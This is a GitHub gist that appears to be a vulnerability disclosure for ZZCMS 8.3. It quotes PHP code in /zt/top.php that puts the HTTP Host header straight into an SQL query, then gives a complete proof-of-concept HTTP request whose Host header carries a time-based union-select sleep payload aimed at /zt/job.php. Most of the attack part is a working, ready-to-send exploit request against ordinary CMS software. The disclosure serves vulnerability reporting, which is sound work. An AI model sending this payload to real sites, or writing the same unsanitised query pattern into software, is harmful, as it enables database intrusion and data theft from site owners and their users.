Skip to content

Instantly share code, notes, and snippets.

@Lz1y

Lz1y/zzcms_sqlinject.md Secret

Last active August 9, 2018 02:00
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Lz1y/3388fa886a3e10edd2a7e93d3c3e5b6c to your computer and use it in GitHub Desktop.
Save Lz1y/3388fa886a3e10edd2a7e93d3c3e5b6c to your computer and use it in GitHub Desktop.
Download ZIP
Raw
zzcms_sqlinject.md

ZZCMS sqlinject in nginx server

PoC by Lz1y

ZZCMS the lastest version download page :

http://www.zzcms.net/about/6.htm

zip installer:

http://www.zzcms.net/download/zzcms8.3.zip

vulnerability code:

in file "/zt/top.php", line 5

<?php
//echo $_SERVER['REQUEST_URI'];
$editor=isset($_REQUEST['editor'])?$_REQUEST['editor']:'';
$editor=substr($_SERVER['HTTP_HOST'],0,strpos($_SERVER['HTTP_HOST'],'.'));//从二级域名中获取用户名
$rs=query("select * from zzcms_userdomain where domain='".$_SERVER['HTTP_HOST']."' and passed=1 and del=0");//从顶级级域名中获取用户名
$row=num_rows($rs);
if (!$row){
	$row=fetch_array($rs);
	$editor=$row["username"];
}
$id=isset($_REQUEST['id'])?$_REQUEST['id']:0;
checkid($id,1);
...

in line 5,coder use $_SERVER['HTTP_HOST'] in sql code,and this variable can be controled by attacker in nginx. So,just find a page that include /zt/top.php ,like /zt/job.php:

<?php
include("../inc/conn.php");
include("../inc/fy.php");
include("top.php");
include("bottom.php");
include("left.php");
...

POC:

GET /zt/job.php?id=0&editor=aa HTTP/1.1
Host: xxxx.com' union select sleep(5),0,0,0,0-- '
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: 
Connection: close

debug info

sleep(5)

sleep(1)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment